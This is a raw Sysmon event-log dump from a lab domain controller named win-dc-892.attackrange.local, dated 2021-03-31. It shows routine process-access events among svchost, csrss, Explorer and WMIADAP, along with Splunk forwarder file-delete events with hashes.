12:04:44.718{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:44.718{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000009479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:44.718{266CAFBE-646C-6064-1000-00000000AE01}11242272C:\Windows\system32\svchost.exe{266CAFBE-655C-6064-4201-00000000AE01}6936\\?\C:\Windows\system32\wbem\WMIADAP.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\wbem\wmisvc.dll+2624|c:\windows\system32\wbem\wmisvc.dll+2491|C:\Windows\SYSTEM32\ntdll.dll+7dc0d|C:\Windows\SYSTEM32\ntdll.dll+3aa09|C:\Windows\SYSTEM32\ntdll.dll+1e86f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
11241100x80000000000000009478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:44.484{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat2021-03-31 12:00:44.752 23542300x80000000000000009477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:44.484{266CAFBE-646C-6064-1100-00000000AE01}1200NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=796CCCD25221B094BDCE6B7E8C0F1393,SHA256=3A62F437824CCBEADD195DB98EC751EC718FD0BC2AC7A0B889FF0A7238E68B8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:44.219{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A980A8A7ED2E54D70BFADA9A160D9085,SHA256=4A3ABE17407BEB62FA63BE92283E4F4C0ED82D1E98A2B4B30837A19E1ADC1FCE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:45.234{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F86F52C9357D538B962A80D9C1FCDFB,SHA256=834BE4ABD0D2B8D4E4A3C0627ED7BBC2F5DD085E12F9C7AFE5CD3FE5439BEB5B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009523Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009522Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009521Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009520Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009518Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009517Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009516Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009515Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009514Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009513Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009512Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009511Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:04:46.436{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
